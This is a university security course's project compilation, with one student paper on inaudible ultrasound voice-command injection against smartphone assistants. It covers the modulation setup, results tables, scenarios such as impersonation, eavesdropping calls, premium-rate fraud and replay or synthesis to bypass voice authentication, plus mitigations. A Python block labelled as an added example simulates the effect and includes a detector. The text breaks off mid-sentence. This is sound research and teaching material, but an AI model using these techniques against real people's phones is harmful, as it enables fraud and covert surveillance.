
NATIONAL UNIVERSITY OF SINGAPORE

SCHOOL OF COMPUTING

CS3235 - Semester I, 2017-2018

Computer Security

Final Versions of the Projects for CS3235 (Computer Security)

Singapore, November 2017.

Table of Contents

Indiscernible Voice Command Injection on Voice-Controlled Systems: Smartphones
Lam Chi Thanh, Francis Cheng, Irvin Lim Wei Quan, Kerr Xiang Jie and Ho Wei Lip (Gp 1)

Drone Hijacking
Lim Shunyong, Ong Jing Yin, Priit Rinken and Shee Zhi Xiang (Gp 2)

Exploration of Weakness in Bike Sharing System
Tan Fengji, Tan Jian Sin, Tan Ngee Joel Jonas, Tan Wee Chen William and Tang Di Feng (Gp 3)

Securing NFC Tags
Chua Yu Peng, Lee Ying Jie, Teng Yong Hao and Wang Weili Aloysius (Gp 4)

VideoCaptcha
Ong Liwei, Lim Wei Jie, Marcus Ng Wen Jian, Mooi Chung Yu Dexter and Low Bao Ling Vivian (Gp 5)

Smart Door Authentication System
Tan Jia Shun, Tan Wang Leng, Tean Zheng Yang, Teddy Hartanto and Yang Jung Kai (Gp 6)

Fingerprint Security System for Web Applications
Adeeb Ashraf Bin Mirzha Alam Arif, Ye Kyaw Swa Aung Joshua, Chua Si Hao, Choy Wan Ying Amanda, and Au-yong Xiang Rong Alwinson (Gp 7)

Home Security
Guo Jiaqi, Kowshik Sundararajan, Low Yong Siang, Muhammad Mustaqiim Bin Muhar and Mun Le Yuan (Gp 8)

Exploration of the Evil Twin Attack on Wifi Access Points and Countermeasure
Melvin Soh, Rajendran Premkumar, Tiago Kieliger, Valérian Rey and Yoshiaki Nishimura (Gp 9)

Exploiting DNS Protocol as a Covert Channel
Amarparkash Singh Mavi, Chua Lin Jing, Chu Ying Yu, Hou Ruomu and Joelle Lim Yan Yi (Gp 10)

Hacking Bluetooth
Lim Yong Zhi, Leon Overweel, Leow Wei Siang and Lau Wen Hao (Gp 11)

Evaluation of the Security of Airline Booking Systems
Lu Yuehan, Matthieu Marie Emmanuel Buot De L’Epine, Tan Xue Si, Tay Keming Justin and Wong Kang Fei (Gp 12)

Indiscernible Voice Command Injection on Voice-Controlled Systems in Smartphones

Lam Chi Thanh (chithanh@u.nus.edu)
Francis Cheng (e0003811@u.nus.edu)
Irvin Lim Wei Quan (e0003697@u.nus.edu)
Kerr Xiang Jie (a0124331@u.nus.edu)
Ho Wei Lip (a0121628@u.nus.edu)

School of Computing, National University of Singapore, 13 Computing Drive, Singapore 117417

ABSTRACT
In this paper, we explore various voice-controlled systems (VCSs) on smartphones, such as Apple Siri and Google Assistant. We show that these VCSs are potentially open to unauthorised activation and use by injecting indiscernible voice commands over the air, without the knowledge of the victim. These indiscernible voice commands are specially constructed ultrasound signals, produced by amplitude modulation of a human voice baseband signal onto an ultrasound carrier. As VCSs are ubiquitous and come built into most smartphones today, we explore the potential vulnerabilities and compare security levels put in place by popular smartphone VCSs, and discuss potential attack scenarios that could arise from specifically using indiscernible voice commands as an attack vector.

Categories and Subject Descriptors
K.6.5 [Management of Computing and Information Systems]: Security and Protection.

General Terms
Design, Security, Human Factors, Experimentation, Verification

Keywords
Siri, Google Assistant, S Voice, smartphones, command injection, voice-controlled systems (VCSs), speech recognition (SR), voice synthesis, security analysis, defence

1. INTRODUCTION
Most modern smartphone mobile operating systems today come built-in with voice-controlled systems (VCSs) such as Siri and Google Assistant, allowing the user to perform actions on the smartphone without any physical interaction, using only his or her voice to control it. With an estimated 62.9% of the world population owning a smartphone in 2016, and with this percentage expected to grow from 2017 to 2019 [7], the smartphone is one of the most ubiquitous devices in the world to be shipped with VCSs. VCSs are available on most smartphones on the market today, such as Google Assistant on Android, Siri on iOS, and S Voice (now superseded by Bixby) on Samsung devices. These VCSs allow smartphone owners to perform many daily tasks on the smartphone such as making calls, sending messages or performing a web search. This method of interaction has become increasingly popular due to its accessibility, which does not require the owner’s physical interaction with the smartphone’s touchscreen, as well as its accuracy in recognizing and interpreting the human voice with a fairly small margin of error.

However, even though there have been recent advances in speech recognition (SR) enhancing the capabilities of VCSs in smartphones today, less is known about the potential vulnerabilities that this additional user interface (UI) to the smartphone may possess. Many VCSs have a limited set of voice commands available on smartphones which are locked with a passcode as a security feature, and other voice commands will not be possible until the phone is unlocked.

Prior work by Diao et al. [4] has shown that attacks such as privilege escalation are possible on VCSs (namely, Google Voice Search on Android), and can even be performed without the owner’s knowledge through injection of inaudible voice commands [17].

Many smartphone owners may be unaware of the presence of VCSs on their smartphones, or may have forgotten about it having previously set it up and configured it. These smartphones may be vulnerable to attack without the owner’s knowledge. This paper thus has two aims: (a) How feasible is it to inject an indiscernible voice command to smartphones? Without professional equipment ourselves, we explored the effectiveness of performing such an attack using only amateur audio equipment and software-defined radios (SDRs). Evaluating the feasibility of such an attack using limited resources allows us to effectively determine the possibility of such an attack being mounted by amateur, malicious agents with a limited budget. (b) To what extent can attacks on VCSs be used to hijack smartphones? We evaluate the possibility of various scenarios through the attack, including activating the said VCS on a passcode-locked smartphone, as well as the possibility

of privilege escalation using VCSs, by unlocking a passcode-locked smartphone using only voice commands.

Hence, this paper aims to further explore the feasibility of mounting an indiscernible voice command injection attack on three VCSs on smartphones, the extent of such attacks, as well as possible defences to mitigate them.

2. VOICE-CONTROLLED SYSTEMS
2.1 Overview of VCSs in Smartphones
Using only the human voice, the user is able to perform tasks on the smartphone without any physical interaction with the smartphone. For example, the user can simply call a person from his contact list with a voice command (e.g. “Call Tom”).

This process of controlling a smartphone using the human voice would require a VCS to bridge both the hardware aspects of capturing and processing audio signals to recognise, capture and convert them into digital audio, as well as the software aspects of translation into text using speech recognition and executing the voice commands from there.

The typical workflow of smartphone VCSs is performed in two parts: the activation of the VCS, followed by execution of the voice command.

Smartphone VCSs can be activated either through physical interaction (e.g. long-press of the home button on an iPhone 6S), or through voice activation using a wake command. We will only be exploring voice activation in this paper, in order to explore the possibility of performing a hands-free attack on smartphone VCSs.

2.1.1 Voice Activation
The basis of voice activation is to allow a user to command his or her smartphone to start listening for and executing voice commands on request. This is normally done through saying a wake command, such as “Hey Siri” on iOS.

While speech recognition of voice commands is not performed in the background whilst the smartphone remains turned on, voice activation is typically available as an always-on feature. This allows the user to activate the VCS at any time, even when the smartphone is in “sleep mode” (i.e. the screen is turned off).

Most smartphones come integrated with a separate, low-power audio processor unit found on the smartphone’s integrated circuit (IC). For example, the Samsung Galaxy S7 uses the DBMD4 voice processor (part number D4A1A) solely for voice activation [6], which comes with a programmable software framework that allows the operating system (OS) to communicate with it [5]. The OS provides the VCS software access to this voice processor unit’s interface, in order to configure wake commands or other settings.

In order to prevent misuse of the VCS, most smartphone VCSs may also restrict the voice activation of the VCS to the owner of the smartphone. The VCS may “train” itself by capturing and saving the wake command as said by the target user, so as to recognise and verify the identity of a user based on his voice used for voice activation.

The saved voice model would then be used by the voice processor module to determine if the user is authorised to activate the VCS under certain circumstances. The conditions in which this verification is enforced are variable; some VCSs may allow any user to perform voice activation whilst the screen is on, while only allowing the original user to perform voice activation whilst the screen is off.

2.1.2 Voice Command Recognition/Execution
Once the VCS has been activated, the VCS would typically enter a state similar to a read-eval-print loop (REPL) found in some programming languages, most notably Lisp. That is, the VCS listens for voice commands, interprets and translates them into text using speech recognition, and then executes the command accordingly, printing any output from the evaluation of the command on the screen, or in the case of VCSs, reading aloud the VCS output via the smartphone’s speaker.

Speech recognition (SR) enables software to recognise, interpret and translate human voice into text. This is usually achieved by modelling the features of the input signal, as well as the target language in which speech recognition is performed. Speech recognition traditionally used hidden Markov models (HMMs) [11], but newer deep learning techniques such as long short-term memory (LSTM) recurrent neural networks (RNNs) have also been recently used in Google’s voice search capabilities [14].

Due to the high computational requirement of speech recognition technology, especially for implementations that make use of deep learning algorithms, the task of speech recognition is usually offloaded to a remote, powerful server. This means that VCSs can function only when the smartphone has a connection to the Internet. The result is that VCSs may seem to take a few moments to “process” the user’s input, before returning the command or results that should be displayed or played back to the user.

2.2 Analysis of Popular Smartphone VCSs
The three most popular VCSs in smartphones today are Siri, Google Assistant and S Voice, available on iOS, Android and Samsung devices respectively. Each VCS has its own set of voice commands, with some overlap in the set of voice commands between most smartphone VCSs.

All VCSs explored are also not enabled on the smartphones by default, and require the owner to explicitly turn on the feature. This will trigger a “training” process to register the owner’s voice saying the wake command, before allowing the VCS to be used.

2.2.1 Siri (iOS)
Siri is the VCS available on Apple’s iOS, the operating system for its hardware, including iPhones and iPads, as well as other operating systems developed by Apple, including macOS and tvOS. Siri has been included in iPhones from iOS 5 onwards.

Siri can be activated either through a long-press of the iPhone’s home button, or through a wake command “Hey Siri”, if Allow Hey Siri is enabled in the Settings app. This will overlay the Siri popup over the screen, which will then prompt the user for further voice commands.

The user must enable Siri through the Settings app, which will prompt the user to say the following phrases in order to recognise the owner’s voice:
• “Hey Siri” (3 times)
• “Hey Siri, how’s the weather today?”
• “Hey Siri, it’s me.”

Additionally, in order to activate Siri from the lock screen or when the phone’s screen is off, the Access on Lock Screen setting must be enabled. This will allow the user to activate Siri (opening the popup) without physical interaction with the phone’s touchscreen, even if the phone is secured with a passcode.

Figure 1. Frequency domain plots of audio signals at various stages of the attack.

2.2.2 Google Assistant (Android)
Google Assistant is the VCS available on most Android phones in the market. It was launched in May 2016, and superseded the functions of Google Now, the previous personal assistant on Android phones launched in July 2012.

Google Assistant can be activated either by opening the Google app and tapping the microphone icon, or with a wake command “Ok Google”. This will overlay Google Assistant over the screen, similar to that of Siri.

This wake command can be enabled through the Google app, under Settings > Voice > ‘Ok Google’ Detection, and enabling Say “Ok Google” any time. This will prompt the user to say “Ok Google” 3 times to train its voice model.

Additionally, in order to activate Google Assistant from the lock screen, the Trusted Voice setting must be enabled within the ‘Ok Google’ Detection settings. This setting will unlock the phone if the wake command matches the stored voice model, simultaneously activating Google Assistant to the foreground.

2.2.3 S Voice (Samsung Android)
S Voice is a VCS found exclusively on Samsung devices, and was launched in May 2012. It is currently superseded by Bixby on newer Samsung devices, such as the Samsung Galaxy S8, which was launched in April 2017.

S Voice can be activated either by opening the S Voice app, or with a wake command “Hi Galaxy”. It should be noted that, unlike the other 2 VCSs, S Voice is a standalone app that does not make use of the same overlay available to Google Assistant.

The user can enable S Voice by enabling the Voice wake up setting. This will prompt the user to say “Hi Galaxy” a few times in order to train the voice model.

S Voice can be activated in the lock screen after enabling Voice wake up. However, if the smartphone is secured with a passcode, the Wake up in secured lock setting must also be enabled.

3. ATTACK DESIGN
The basis of the attack is to design an audio signal that is indiscernible to the human ear, yet can be captured and recognised by VCSs.

3.1 Nonlinearity Effects
Although audio hardware is designed to be linear with respect to input parameters, in reality it may exhibit nonlinearities. The audio hardware available on a smartphone may include a microphone, (pre)-amplifier, low-pass filter (LPF) as well as an audio-to-digital converter (ADC).

Roy et al. argued that, in theory, amplifiers should produce output signals linearly with respect to the input sound and gain [12]. However, acoustic amplifiers tend to exhibit nonlinearities with respect to gain at frequencies above 25 kHz.

Without going into the exact mathematical modelling of the signal, Roy et al. showed that at higher frequencies, an additional “shadow” frequency may be generated after an input signal passes through an amplifier, albeit at a lower level [12].

3.2 Exploiting Nonlinearity Effects
By exploiting the nonlinearities that exist in actual hardware, including the amplifiers found in smartphones, we are able to design an attack to transmit audio signals which should be indiscernible to the human ear, yet will be recognised by smartphones.

Zhang et al. showed that it is possible to make use of amplitude modulation (AM) to modulate the baseband (i.e. the target payload) on an ultrasound carrier (i.e. frequencies greater than or equal to 20 kHz), which produces audio signals that are inaudible to the human ear, but are recognised by the VCSs tested [17].

As seen in Figure 1, by modulating an audible target audio signal on an ultrasound carrier, the resultant signal is beyond the upper limit of the human adult hearing range at 20 kHz. This signal can be transmitted via an ultrasound transducer (i.e. speaker) to the victim’s smartphone. Nonlinearity effects exhibited by the amplifier embedded within the smartphone hardware cause “shadow frequencies” to “appear” below the 20 kHz cut-off point. Once passed through the smartphone’s low-pass filter, these frequencies remain intact, and can then be converted to digital signals and piped into software-defined speech recognition modules.

4. EXPERIMENTAL DESIGN
We performed an experiment to attempt the described attack using only entry-level audio equipment on various smartphones, to accomplish our two aims of this research. These two aims are to evaluate the feasibility of such an attack, as well as to explore the different types of attacks through such an attack vector.

4.1 Experimental Setup
The experimental setup involves the preparation of the modulated signals through the use of software-defined radios (SDRs), the audio equipment used to transmit and play back the sound, as well as various smartphones with their VCSs enabled and trained. A photo of the experimental setup can be seen in Figure 2.
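The nonlinearity effect described in sections 3.1 and 3.2 above can be reproduced numerically. The following is an added example, not code from the paper: it assumes a quadratic amplifier model y = A1·x + A2·x², a constructed 1 kHz test tone in place of a voice recording, a 25 kHz carrier, and a hypothetical detector `ultrasound_carrier_suspected` that only works on a capture sampled fast enough to still contain ultrasound.

```python
import math

FS = 192_000        # simulation sample rate, Hz (assumed; keeps 2 * carrier below Nyquist)
N = 19_200          # 0.1 s of samples, so every tone used here sits on an exact 10 Hz bin
F_CARRIER = 25_000  # ultrasound carrier, Hz (assumed value above the 20 kHz hearing limit)
F_TONE = 1_000      # constructed 1 kHz test tone standing in for the voice baseband
DEPTH = 0.5         # AM modulation depth m (assumed)
A1, A2 = 1.0, 0.1   # linear gain and quadratic coefficient of the amplifier model (assumed)


def amplitude_at(samples, freq_hz):
    """Amplitude of the sinusoidal component at freq_hz (single-bin DFT)."""
    w = 2 * math.pi * freq_hz / FS
    re = sum(x * math.cos(w * n) for n, x in enumerate(samples))
    im = sum(x * math.sin(w * n) for n, x in enumerate(samples))
    return 2 * math.hypot(re, im) / len(samples)


def pure_tone(freq_hz):
    """Unit-amplitude cosine at freq_hz, N samples long."""
    return [math.cos(2 * math.pi * freq_hz * n / FS) for n in range(N)]


def am_signal():
    """(1 + m*cos(2*pi*f_t*t)) * cos(2*pi*f_c*t): the test tone on the ultrasound carrier."""
    tone, carrier = pure_tone(F_TONE), pure_tone(F_CARRIER)
    return [(1 + DEPTH * b) * c for b, c in zip(tone, carrier)]


def nonlinear_amplifier(samples):
    """Amplifier model y = A1*x + A2*x^2; the x^2 term is the nonlinearity.

    Squaring the AM signal yields, among other terms, A2 * m * cos(2*pi*f_t*t):
    the "shadow" copy of the baseband that lands below the 20 kHz cut-off.
    """
    return [A1 * x + A2 * x * x for x in samples]


def ultrasound_carrier_suspected(samples, floor=0.05):
    """Defensive check on a wideband (pre-filter) capture.

    Flags any narrowband component between 20 kHz and 40 kHz whose amplitude
    exceeds `floor` (an assumed threshold relative to full scale). A 10 ms
    window gives 100 Hz bins, so a carrier between scan points still leaks
    most of its amplitude into a neighbouring bin.
    """
    window = samples[:1920]
    strongest = max(amplitude_at(window, f) for f in range(20_000, 40_001, 100))
    return strongest > floor


if __name__ == "__main__":
    transmitted = am_signal()
    received = nonlinear_amplifier(transmitted)
    print("1 kHz amplitude in transmitted signal:", amplitude_at(transmitted, F_TONE))
    print("1 kHz amplitude after the amplifier:  ", amplitude_at(received, F_TONE))
    print("2 kHz amplitude after the amplifier:  ", amplitude_at(received, 2 * F_TONE))
    print("carrier flagged in transmitted signal:", ultrasound_carrier_suspected(transmitted))
    print("carrier flagged in plain 1 kHz tone:  ", ultrasound_carrier_suspected(pure_tone(F_TONE)))
```

With A2 set to 0 (an ideal linear amplifier) the 1 kHz component after the amplifier vanishes, which is why the attack depends on hardware nonlinearity.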

4.1.1 Hardware Setup
The audio hardware used was as follows:

● Power amplifier: Topping TP20-MK2
● Audio interface (DAC): Onyx Blackjack
● Bookshelf speakers: Audio Image brand

Various VCSs were also tested on the following smartphones:
● Google Assistant: Samsung Galaxy S7, Xiaomi Note 3
● iOS Siri: iPhone 5S, iPhone 6, iPhone 7
● Samsung S Voice: Samsung Galaxy S7

4.1.2 Software Setup
In order to execute the attack, audio recording software (e.g. Audacity) was used to record the voice commands and wake commands using our voices. The audio was recorded using the in-built microphone of a MacBook Pro.

Additionally, we used GNU Radio, a free software development toolkit for radio and signal processing. This was used for modulating an input audio file onto a given carrier frequency, and sending the resultant signal to the audio hardware setup as described above. The flow graph used in GNU Radio is shown in Figure 3.

Figure 2. Experimental hardware setup for performing the attack.

Figure 3. GNU Radio flow graph for amplitude modulation.

4.2 Threat Model
The attacker’s goal is to use indiscernible voice commands to activate the VCS without the victim’s knowledge.

It is assumed that the attacker does not have direct access to the victim’s smartphone, and is unable to interact with the owner to perform any actions on the VCS. The attacker is not able to have physical interaction with the VCS, alter the settings of the VCS or install any malicious software.

However, the attacker is aware of the VCS being used based on the smartphone’s characteristics. For example, if the smartphone is an iPhone, the attacker can infer that the VCS most likely being used is Siri.

It is also assumed that the victim’s smartphone is locked (i.e. at the time of attack, the phone is at the lock screen), although the victim’s smartphone may or may not be secured with a passcode. Since it was established that some voice commands require the passcode to be entered (if secured), this factor must also be taken into account when assessing the effectiveness of the attack.

Furthermore, it is also assumed that the attacker possesses the necessary equipment such as that described above, in order to transmit the audio signals to the victim’s smartphone.

4.3 Audio Inputs
We recorded various voice commands and wake commands using our own voices for each of the three VCSs that were tested. These voice recordings were then piped to the amplitude modulator using GNU Radio, and played back using the audio setup.

The carrier frequency can be controlled in real-time during playback in GNU Radio. We experimented with various carrier frequencies centred around 20 kHz.

4.4 Methodology
To perform the attack, we first set up the various VCSs on the target smartphones. We also recorded different wake commands (e.g. “Hey Siri”, “Ok Google”) as well as voice commands (e.g. “Call 12345678”, “Open WhatsApp”) using our own voices, and subsequently modulated them using GNU Radio on an ultrasound carrier. We tested different combinations for playback of these signals to different VCSs, using the audio hardware setup as described in subsection 4.1.1.

Firstly, in order to evaluate the feasibility of mounting such an attack, we assessed the possibility of VCS activation using both the owner’s voice and a foreign voice.

In particular, we wanted to identify whether it was possible to activate the various VCSs using a foreign voice, as well as whether it was still possible after modulation, as it is more unlikely for the attacker to be in possession of a recording with the owner saying the wake command. Foreign voices can either be another person’s voice (i.e. the voice of someone who did not train the VCS), or one that is generated using text-to-speech (TTS) tools.

On top of trying out these commands to activate the various VCSs, we also explored the feasibility of using foreign voices within voice command speech recognition, once the VCS has been activated.

Secondly, through some initial experimentation, we realised that VCSs could be activated within the lock screen before the smartphone was unlocked. We also found out that the set of voice commands that were available on VCSs when the smartphone was locked was different from when the smartphone was unlocked.

In order to evaluate the attacks that are possible through the VCS as an attack vector, we explored what voice commands were allowed by the VCS depending on two different contexts: “locked” and “unlocked”. The “locked” context would refer to scenarios where the smartphone is currently at the lock screen, protected with a passcode or some other mechanism, whilst the “unlocked” context refers to scenarios where the smartphone is

either within the home screen/within another application, or does not have any protection mechanisms such as passcodes in place.

We thus played back the modulated signals for both human voices and TTS-generated voices in these two different contexts, whilst the VCS is already activated.

4.5 Experimental Results
Through our experiment, we were indeed able to play back the modulated voice signal through the hardware and software setup as described above, and the output was only slightly noticeable. As we did not possess a sound level meter, we were unable to measure the exact loudness of the resultant output signal.

The following two tables show the experimental results of performing both VCS activation and voice command speech recognition. We explored using both owner’s voices and foreign voices for both scenarios.

Table 1. Results of activation of various VCSs

| | Siri | Google Assistant | S Voice |
|---|---|---|---|
| Owner’s Voice | ✓ | ✓¹ | ✓ |
| Foreign Voice | ✓ | ✗ | ✓² |
| Modulated Owner’s Voice | ✗ | ✓¹ | ✓ |
| Modulated Foreign Voice | ✗ | ✗ | ✗ |

¹ The smartphone must not be asleep (i.e. screen is switched on).
² The smartphone must be unlocked (i.e. within the home screen or another application) for this to work.

Table 2. Results of speech recognition of voice commands for various VCSs (once VCS is activated)

| | Siri | Google Assistant | S Voice |
|---|---|---|---|
| Owner’s Voice | ✓ | ✓ | ✓ |
| Foreign Voice | ✓ | ✓ | ✓ |
| Modulated Owner’s Voice | ✓ | ✓ | ✓ |
| Modulated Foreign Voice | ✓ | ✓ | ✓ |

The subsequent tables show the experimental results to accomplish the second aim of the experiment, where we executed different voice commands in both the “locked” and “unlocked” contexts.

Table 3. Speech recognition of modulated voice commands once VCS is activated (in the “locked” context)

| Commands (“Locked” Context) | Siri | Google Assistant | S Voice |
|---|---|---|---|
| Make a phone call (“Call 9123-4567”) | ✓ | ✗ | ✓ |
| Visit URL in browser (“Open google.com”) | ✗ | ✗ | ✗ |
| Perform web search (“Search for pizza”) | ✗ | ✗ | ✗ |
| Open application (“Open WhatsApp”) | ✗ | ✗ | ✗ |
| Send text message (“Message John”) | ✓ | ✗ | ✓ |
| Open email (“Open emails”) | ✗ | ✗ | ✗ |
| Unlock phone | ✗ | ✓³ | ✗ |

³ The “Trusted Voice” setting must be enabled, and the smartphone’s screen must be switched on. However, it is also possible to use S Voice on a Samsung Android smartphone to turn on the screen, followed by using Google Assistant to bypass any passcode lock mechanisms.

Table 4. Speech recognition of modulated voice commands once VCS is activated (in the “unlocked” context)

| Commands (“Unlocked” Context) | Siri | Google Assistant | S Voice |
|---|---|---|---|
| Make a phone call (“Call 9123-4567”) | ✓ | ✓ | ✓ |
| Visit URL in browser (“Open google.com”) | ✓ | ✓ | ✓ |
| Perform web search (“Search for pizza”) | ✓ | ✓ | ✓ |
| Open application (“Open WhatsApp”) | ✓ | ✓ | ✓ |
| Send text message (“Message John”) | ✓ | ✓ | ✓ |
| Open email (“Open emails”) | ✓ | ✓ | ✓ |

4.6 Discussion
It was mentioned that the modulated voice output signal was slightly noticeable when played back through our hardware and software setup. Theoretically, since we are modulating the baseband signal on a carrier frequency at 20 kHz, which is outside of the adult human hearing range, we should in fact not be able to hear any sounds.

This could be because the audio hardware that was being used to play back the modulated voice signals also exhibited nonlinearities. Therefore, the “shadow frequencies” at an audible frequency range had already existed within the playback system, and were thus picked up by both the human ear and the VCSs, albeit at a low level.

In the first part of the experiment where we explored using different types of voices to activate various VCSs, we were successful in utilising the modulated signal of the owner’s voice to activate both Google Assistant and S Voice. However, we were unsuccessful in obtaining the same results for Siri using the same equipment.

This discrepancy may have been due to various factors, such as the quality of the equipment that was being used to play back the signals to the smartphones, or different physical characteristics of the embedded audio hardware inside of different smartphones.

We also observed (non-empirically) that the Samsung Galaxy S7 tends to pick up the “shadow frequencies” the most often out of all the other phones tested. We managed to verify this by using the in-built voice recorder application within the different smartphones tested to record the playback of the modulated voice signals, and indeed we managed to hear the original voice much more clearly in the Samsung Galaxy S7 as compared to the other phones.

Comparing Table 1 and Table 2, we found out that speech recognition of voice commands was indeed less strict as compared to speech recognition for VCS activation. There are various measures in place to prevent a foreign voice from activating the VCS on both Google Assistant and S Voice, especially when the phone is locked. This supports the idea that a separate speech recognition system is used for voice commands versus activation.

Comparing Table 3 and Table 4, we found that the number of commands available on a locked smartphone is indeed very limited. All three VCSs similarly have various measures in place to prevent misuse of the VCS by unwanted parties. For example, all three VCSs did not allow the user to view emails on the smartphone without first unlocking it.

However, Google Assistant provides a “Trusted Voice” feature, allowing owners to unlock their smartphone using their voice. This could essentially allow smartphones with this feature enabled to have unlimited access to all voice commands within Google Assistant.

5. POSSIBLE ATTACKS
Since the ultrasound medium allows us to send voice commands and wake commands covertly, we explore different attacks based on the level of “access” that an attacker has obtained.

This access level is directly correlated with whether the smartphone being attacked is secured with a passcode or not (i.e. “locked” or “unlocked” contexts). Furthermore, if the attacker is able to obtain a recording of the victim’s voice where he or she is saying the wake command, this would expand the scope of the types of attacks that are possible on the smartphone.

5.1 Attacks in the “Locked” Context
The following sections explore possible attacks whilst the victim’s smartphone is locked with a passcode or some other lock mechanism via the OS.

Since it was shown in Table 3 that Google Assistant explicitly requires the wake command with the owner’s voice to activate the VCS in the “locked” context, as well as the “Trusted Voice” setting enabled, we assume that Google Assistant is not vulnerable whilst the smartphone is in the “locked” context.

5.1.1 Spoofing/Impersonation
VCSs Affected: Siri, S Voice

In Table 3 above, we showed that it was possible to perform an indiscernible voice command injection to send messages within the “locked” context.

One possible attack would be as follows: Suppose that Alice’s phone is being attacked, where the attacker injects a command “Message Bob”, followed by “Please help me, I need $1000 urgently. Can you transfer it to my bank account 123-45678-9?”.

The attacker can impersonate Alice when communicating with her contacts via text message (such as through SMS) without the knowledge of Alice, possibly extracting critical data, information or resources (in this case, it was money).

5.1.2 Snooping/Interception
VCSs Affected: Siri, S Voice

In Table 3 above, we showed that it was also possible to perform an indiscernible voice command injection to make calls to arbitrary numbers whilst in the “locked” context.

One possible attack to snoop around the victim would be to inject a voice command that makes a call to a number owned by the attacker, such as “Call 9123 4567”.

Without the victim’s knowledge, the attacker can eavesdrop on the sounds around the victim, including his private conversations with others, as long as the call is still ongoing. The only trace that this leaves behind is an entry in the call log, which might reveal the attacker’s phone number.

5.1.3 Premium-Rate Phone Calls
VCSs Affected: Siri, S Voice

Another rather niche type of attack would be to command unsuspecting victims’ smartphones to make phone calls to premium-rate phone numbers, which could cost the victim up to £6.98 (USD $9.17) per minute in the United Kingdom (UK) [9], charged to his or her post-paid phone bill.

An attacker who owns a premium-rate number could potentially scam others out of their money without their knowledge through such attacks.

5.2 Attacks in the “Unlocked” Context
There are many more attacks which can only be performed whilst
the victim’s smartphone is not secured with a passcode, or has
already been unlocked via different means.

In particular, Google Assistant’s “Trusted Voice” feature allows
the smartphone to be unlocked using the owner’s voice. We had
shown that the modulated voice signal of the owner’s voice saying
“Ok Google” was sufficient to unlock an Android phone from a
“locked” context.

5.2.1 Denial of Service (DoS)
VCSs Affected: Siri, Google Assistant, S Voice

There are multiple ways that a smartphone can be denied access
from legitimate parties, such as through turning the smartphone
off, disabling incoming/outgoing calls and connections, or by
utilising the compromised smartphone as an attack vector to
perform a DoS attack on another party.

For example, a command such as “Turn on airplane mode” could
be used to disable the smartphone from communicating via
cellular networks and/or wireless connections. This could be used
to prevent the victim from receiving push notifications from
remote servers without his/her knowledge whilst the attack is in
progress, for example.

Another possible attack could be to launch a DoS attack on
another smartphone using the victim’s smartphone, similar to how
compromised machines may be used in a botnet. If the attack can
be carried out on a large scale, such that the modulated signals can
be broadcasted in a densely-populated area, this may cause many
VCSs in smartphones in the area to be activated, launching a
large-scale DDoS attack by commanding these VCSs to send a
text message to a single phone number to overload the target’s
inbox, for example.

Lastly, another trivial type of DoS attack would be to drain
resources from the victim’s smartphone. For example, repeated
activation of the VCS without the victim’s knowledge may drain
the battery of the smartphone quicker than normal. This can be
achieved in the “locked” context as well.

5.2.2 Drive-By Download
VCSs Affected: Siri, Google Assistant, S Voice

By making use of voice commands to visit a URL, it could be
possible to execute a drive-by download of malware on the
target’s smartphone. The malicious software, once installed on the
smartphone, could then be used by the attacker to remotely access
and control the smartphone for further exploitation.

5.3 Bypassing VCS Voice Activation
Since the success of VCS voice activation is dependent on the
identity of the user who says the wake command, the described
attacks may only work in specific scenarios, if the attacker is able
to activate the VCS in the first place.

The following attacks show possible ways to bypass this
restriction.

5.3.1 Replay Attacks
VCSs Affected: Siri, Google Assistant, S Voice

The use of a voice signal as an identity verification mechanism is
convenient, but is not without its faults. It is inherently prone to
replay attacks since the wake command remains identical across
different activations of the VCS.

An attacker could obtain an audio recording of the victim’s voice
when he is activating the VCS, and utilise the above techniques to
covertly transmit the same audio recording through ultrasound
carriers, effectively bypassing the identity verification
mechanisms in the VCS.

This attack is especially devastating in Google Assistant with
“Trusted Voice” enabled, since this would allow an attacker to
bypass not just voice activation, but to also unlock the phone and
bypass the protection usually enforced by a passcode or
fingerprint.

5.3.2 Voice Synthesis
If the attacker is not able to obtain such a recording, another
possible way to bypass this restriction is to synthesise a voice
signal that says the wake command, using the same features as the
owner’s voice.

If the attacker manages to obtain a sufficiently long recording of the
victim’s voice, the attacker can attempt to perform concatenative
speech synthesis by first extracting out phonemes from a given
audio signal, and recombining them to match the phonemes of the
desired text [3].

The idea is to recombine the audio segments corresponding to the
phonemes into that of a wake command. For example, for the
wake command “Ok Google”, the IPA transcription would be
“oˈkeɪˈɡuːɡul”. We attempted to extract out segments of an audio
file that contained the relevant phonemes that could allow us to
reconstruct a wake command for our purposes.

CMU Sphinx
We attempted to perform automatic concatenative speech
synthesis by first making use of a phonetic library PocketSphinx
from the CMU Sphinx project, to convert an input audio signal
into phonemes [2]. We were successful in identifying the
phonemes (with some degree of accuracy) from a given input
audio file. Figure 4 below shows some sample output from using
PocketSphinx’s command-line interface to transcribe an audio file
of one of our voices saying “Ok Google”.

Figure 4. Using PocketSphinx to convert an input audio file to
phonemes (in ARPAbet format).

The start and end times of each of the identified phonemes
corresponding to the audio file are displayed in the output, which
could allow us to write a script to extract out the relevant parts of
the audio file respectively.

However, we were unsuccessful in using a synthesised voice
audio file to activate the VCS, through both normal, audible
playback as well as through modulated playback.

Voice Synthesis Services
We also tried out Lyrebird, a cloud-based service (currently still
in beta) that uses deep learning methods to similarly synthesise
voice, using uploaded file samples of the person’s voice [8].
However, we discovered that the success rate of such an approach
is extremely low, and also requires a large amount of speech
samples of the victim’s voice.

Adobe Voco is also another software that aims to achieve the
same purpose, and is known as being the “Photoshop for the
voice”, purportedly allowing easy manipulation of the human
voice within audio files [1]. It is still yet to be officially released,
and requires approximately 20 minutes of sample speech files of
the target user to be effective.

We believe that with the development of deep learning techniques
such as generative adversarial networks (GANs), voice synthesis
is an increasingly possible and realistic attack in the near future
requiring significantly fewer samples. For example, WaveNet by
Google Deepmind is a generative model which aims to synthesise
speech from text, mimicking the human voice much closer than
existing text-to-speech (TTS) systems [17].

6. MITIGATIONS
Current VCSs explored have shown to have some existing
security mechanisms in place. For example, if the smartphone is
locked with a passcode, all VCSs do not allow access to data that
is otherwise only accessible after entering the passcode.
Furthermore, it was also shown that Google Assistant and S Voice
restrict the VCS to be activated on the lock screen via voice
activation only if it matches the stored voice model.

However, all VCSs are still susceptible to replay attacks on voice
activation. This allows an attacker to replay a recorded signal of
the owner’s voice saying the wake command to the smartphone,
which can then activate the VCS.

To prevent any of such attacks, the best recommendation would
be to disable voice activation on the VCS, which would help users
ensure that attackers will not be successful in performing an attack
since they are not able to activate the VCS. However, this may be
a major inconvenience to users who are already accustomed to
using their VCS via voice activation.

Alternatively, another option would be to enforce a passcode on
the smartphone. This would severely limit the capabilities of the
